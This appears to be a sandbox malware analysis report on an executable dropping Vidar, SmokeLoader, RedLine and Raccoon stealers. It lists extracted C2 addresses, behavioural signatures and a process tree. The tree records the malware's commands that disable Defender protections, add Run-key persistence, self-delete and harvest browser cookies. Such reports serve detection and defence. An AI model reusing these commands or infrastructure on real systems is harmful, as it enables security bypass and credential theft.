Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1804s
  • max time network
    1821s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    02-08-2021 17:38

General

  • Target

    8 (18).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

2_8_r

C2

zertypelil.xyz:80

Extracted

Family

redline

Botnet

Version 3.02

C2

149.202.65.221:64206

Extracted

Family

redline

Botnet

5k_30_SUM

C2

45.14.49.117:14251

Extracted

Family

vidar

Version

39.8

Botnet

937

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

raccoon

Botnet

2ca2376c561d1af7f8b9e6f3256b06220a3db187

Attributes
  • url4cnc

    https://telete.in/johnyes13

rc4.plain
rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • suricata: ET MALWARE Win32/Kelihos.F exe Download 2
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 18 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 30 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 28 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
      PID:2728
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
      • Modifies registry class
      PID:2720
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2712
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2420
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2400
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1868
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1408
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1396
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1176
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1100
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1036
                      • C:\Users\Admin\AppData\Roaming\uafdfbv
                        C:\Users\Admin\AppData\Roaming\uafdfbv
                        2⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5924
                      • C:\Users\Admin\AppData\Roaming\sjfdfbv
                        C:\Users\Admin\AppData\Roaming\sjfdfbv
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:5308
                        • C:\Users\Admin\AppData\Roaming\sjfdfbv
                          C:\Users\Admin\AppData\Roaming\sjfdfbv
                          3⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:196
                      • \??\c:\windows\system\svchost.exe
                        c:\windows\system\svchost.exe
                        2⤵
                          PID:6020
                        • C:\Users\Admin\AppData\Roaming\sjfdfbv
                          C:\Users\Admin\AppData\Roaming\sjfdfbv
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:5476
                          • C:\Users\Admin\AppData\Roaming\sjfdfbv
                            C:\Users\Admin\AppData\Roaming\sjfdfbv
                            3⤵
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:3588
                        • C:\Users\Admin\AppData\Roaming\uafdfbv
                          C:\Users\Admin\AppData\Roaming\uafdfbv
                          2⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:4608
                        • C:\Users\Admin\AppData\Roaming\icfdfbv
                          C:\Users\Admin\AppData\Roaming\icfdfbv
                          2⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:6104
                        • C:\Windows\system32\rundll32.exe
                          C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\plsapCrDZ\plsapCrDZ.dll",plsapCrDZ
                          2⤵
                          • Windows security modification
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          PID:3768
                        • \??\c:\windows\system\svchost.exe
                          c:\windows\system\svchost.exe
                          2⤵
                            PID:416
                          • C:\Users\Admin\AppData\Roaming\sjfdfbv
                            C:\Users\Admin\AppData\Roaming\sjfdfbv
                            2⤵
                              PID:308
                            • C:\Users\Admin\AppData\Roaming\icfdfbv
                              C:\Users\Admin\AppData\Roaming\icfdfbv
                              2⤵
                                PID:4280
                              • C:\Users\Admin\AppData\Roaming\uafdfbv
                                C:\Users\Admin\AppData\Roaming\uafdfbv
                                2⤵
                                  PID:3140
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                1⤵
                                  PID:296
                                • C:\Users\Admin\AppData\Local\Temp\8 (18).exe
                                  "C:\Users\Admin\AppData\Local\Temp\8 (18).exe"
                                  1⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:992
                                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:1800
                                    • C:\Users\Admin\AppData\Local\Temp\7zS807BE3D4\setup_install.exe
                                      "C:\Users\Admin\AppData\Local\Temp\7zS807BE3D4\setup_install.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of WriteProcessMemory
                                      PID:664
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_1.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:3820
                                        • C:\Users\Admin\AppData\Local\Temp\7zS807BE3D4\sonia_1.exe
                                          sonia_1.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of WriteProcessMemory
                                          PID:2040
                                          • C:\Users\Admin\AppData\Local\Temp\7zS807BE3D4\sonia_1.exe
                                            "C:\Users\Admin\AppData\Local\Temp\7zS807BE3D4\sonia_1.exe" -a
                                            6⤵
                                            • Executes dropped EXE
                                            PID:932
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_2.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:1004
                                        • C:\Users\Admin\AppData\Local\Temp\7zS807BE3D4\sonia_2.exe
                                          sonia_2.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious behavior: MapViewOfSection
                                          PID:488
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_3.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2264
                                        • C:\Users\Admin\AppData\Local\Temp\7zS807BE3D4\sonia_3.exe
                                          sonia_3.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:2164
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2164 -s 908
                                            6⤵
                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                            • Program crash
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4664
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_4.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2108
                                        • C:\Users\Admin\AppData\Local\Temp\7zS807BE3D4\sonia_4.exe
                                          sonia_4.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3840
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_5.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:3708
                                        • C:\Users\Admin\AppData\Local\Temp\7zS807BE3D4\sonia_5.exe
                                          sonia_5.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          PID:4000
                                          • C:\Users\Admin\Documents\OZYRlO8lXtItnJk8bf4AU1ff.exe
                                            "C:\Users\Admin\Documents\OZYRlO8lXtItnJk8bf4AU1ff.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4916
                                          • C:\Users\Admin\Documents\DghFLnIoddzUS896NsndxU_o.exe
                                            "C:\Users\Admin\Documents\DghFLnIoddzUS896NsndxU_o.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:4904
                                            • C:\Users\Admin\AppData\Local\Temp\s7xqwrx2RS.exe
                                              "C:\Users\Admin\AppData\Local\Temp\s7xqwrx2RS.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:4620
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "powershell" Add-MpPreference -ExclusionPath C:\
                                                8⤵
                                                  PID:5436
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "powershell" Set-MpPreference -PUAProtection 1
                                                  8⤵
                                                    PID:5508
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsUpdate' -Value '"C:\Users\Admin\AppData\Local\Temp\AutoWindowsUpdate\win32update.exe"' -PropertyType 'String'
                                                    8⤵
                                                    • Adds Run key to start application
                                                    PID:5440
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "powershell" Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications' -Name DisableNotifications -Value 1
                                                    8⤵
                                                      PID:5444
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\DghFLnIoddzUS896NsndxU_o.exe"
                                                    7⤵
                                                      PID:4696
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /T 10 /NOBREAK
                                                        8⤵
                                                        • Loads dropped DLL
                                                        • Delays execution with timeout.exe
                                                        • Modifies registry class
                                                        PID:5336
                                                  • C:\Users\Admin\Documents\LxYNb5WL4nppqmfZsv_xFAPt.exe
                                                    "C:\Users\Admin\Documents\LxYNb5WL4nppqmfZsv_xFAPt.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:4892
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 660
                                                      7⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4684
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 648
                                                      7⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2204
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 680
                                                      7⤵
                                                      • Program crash
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1684
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 752
                                                      7⤵
                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                      • Program crash
                                                      PID:4112
                                                  • C:\Users\Admin\Documents\agVIumcxj6TUDN7F_WGd3zx3.exe
                                                    "C:\Users\Admin\Documents\agVIumcxj6TUDN7F_WGd3zx3.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:4884
                                                  • C:\Users\Admin\Documents\BxRkRbUTXjpSCR9hRrKtiGXT.exe
                                                    "C:\Users\Admin\Documents\BxRkRbUTXjpSCR9hRrKtiGXT.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4868
                                                  • C:\Users\Admin\Documents\L3BUf8gOxfkUtsTwrrfl91wu.exe
                                                    "C:\Users\Admin\Documents\L3BUf8gOxfkUtsTwrrfl91wu.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:4860
                                                    • C:\Users\Admin\Documents\L3BUf8gOxfkUtsTwrrfl91wu.exe
                                                      "C:\Users\Admin\Documents\L3BUf8gOxfkUtsTwrrfl91wu.exe" -a
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:4492
                                                  • C:\Users\Admin\Documents\KJvY1AV7Phzed8Z8zSSnhlku.exe
                                                    "C:\Users\Admin\Documents\KJvY1AV7Phzed8Z8zSSnhlku.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:4936
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:2344
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:4232
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      7⤵
                                                        PID:2100
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                          PID:5900
                                                      • C:\Users\Admin\Documents\V_MaNyZCcEfZMmJsxW22Rb5w.exe
                                                        "C:\Users\Admin\Documents\V_MaNyZCcEfZMmJsxW22Rb5w.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:4272
                                                      • C:\Users\Admin\Documents\bD7GGjoONficbwJeNYQhiqiQ.exe
                                                        "C:\Users\Admin\Documents\bD7GGjoONficbwJeNYQhiqiQ.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:4244
                                                        • C:\Users\Admin\Documents\bD7GGjoONficbwJeNYQhiqiQ.exe
                                                          "C:\Users\Admin\Documents\bD7GGjoONficbwJeNYQhiqiQ.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Checks SCSI registry key(s)
                                                          • Suspicious behavior: MapViewOfSection
                                                          PID:3592
                                                      • C:\Users\Admin\Documents\cKhkk_ynN9Z8LJybynVNm1gU.exe
                                                        "C:\Users\Admin\Documents\cKhkk_ynN9Z8LJybynVNm1gU.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:4688
                                                        • C:\Users\Admin\Documents\cKhkk_ynN9Z8LJybynVNm1gU.exe
                                                          "{path}"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:5648
                                                      • C:\Users\Admin\Documents\3PIzwHbHkrM1YolqHEqrjDPa.exe
                                                        "C:\Users\Admin\Documents\3PIzwHbHkrM1YolqHEqrjDPa.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:4480
                                                        • C:\Users\Admin\Documents\3PIzwHbHkrM1YolqHEqrjDPa.exe
                                                          C:\Users\Admin\Documents\3PIzwHbHkrM1YolqHEqrjDPa.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2328
                                                      • C:\Users\Admin\Documents\tS8H7XjPpIwwjXGv8iARkZLM.exe
                                                        "C:\Users\Admin\Documents\tS8H7XjPpIwwjXGv8iARkZLM.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:2680
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 664
                                                          7⤵
                                                          • Program crash
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:628
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 680
                                                          7⤵
                                                          • Program crash
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4296
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 712
                                                          7⤵
                                                          • Program crash
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4508
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 752
                                                          7⤵
                                                          • Program crash
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4768
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 884
                                                          7⤵
                                                          • Program crash
                                                          PID:4792
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 1072
                                                          7⤵
                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                          • Program crash
                                                          PID:4252
                                                      • C:\Users\Admin\Documents\WwosXKA7CjsZI4Yc3KrnkPCR.exe
                                                        "C:\Users\Admin\Documents\WwosXKA7CjsZI4Yc3KrnkPCR.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4424
                                                        • C:\Users\Admin\Documents\WwosXKA7CjsZI4Yc3KrnkPCR.exe
                                                          "C:\Users\Admin\Documents\WwosXKA7CjsZI4Yc3KrnkPCR.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Modifies data under HKEY_USERS
                                                          PID:5652
                                                      • C:\Users\Admin\Documents\B9com04s4Y512TUdprXeG6R5.exe
                                                        "C:\Users\Admin\Documents\B9com04s4Y512TUdprXeG6R5.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Drops file in Program Files directory
                                                        PID:4392
                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                          "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Drops startup file
                                                          PID:4804
                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:5728
                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:5808
                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:5564
                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:4404
                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:1680
                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                            8⤵
                                                              PID:5848
                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:4716
                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:5848
                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Checks whether UAC is enabled
                                                            • Drops file in Program Files directory
                                                            PID:3804
                                                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                            "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:4996
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:5776
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:5188
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              8⤵
                                                                PID:3824
                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                8⤵
                                                                  PID:5080
                                                            • C:\Users\Admin\Documents\Rerc7TyS1ORcmF8ZrWbDp5zM.exe
                                                              "C:\Users\Admin\Documents\Rerc7TyS1ORcmF8ZrWbDp5zM.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:4456
